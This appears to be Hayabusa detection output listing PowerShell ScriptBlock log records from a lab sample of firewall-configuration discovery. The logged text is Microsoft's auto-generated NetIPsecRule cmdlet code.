Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; 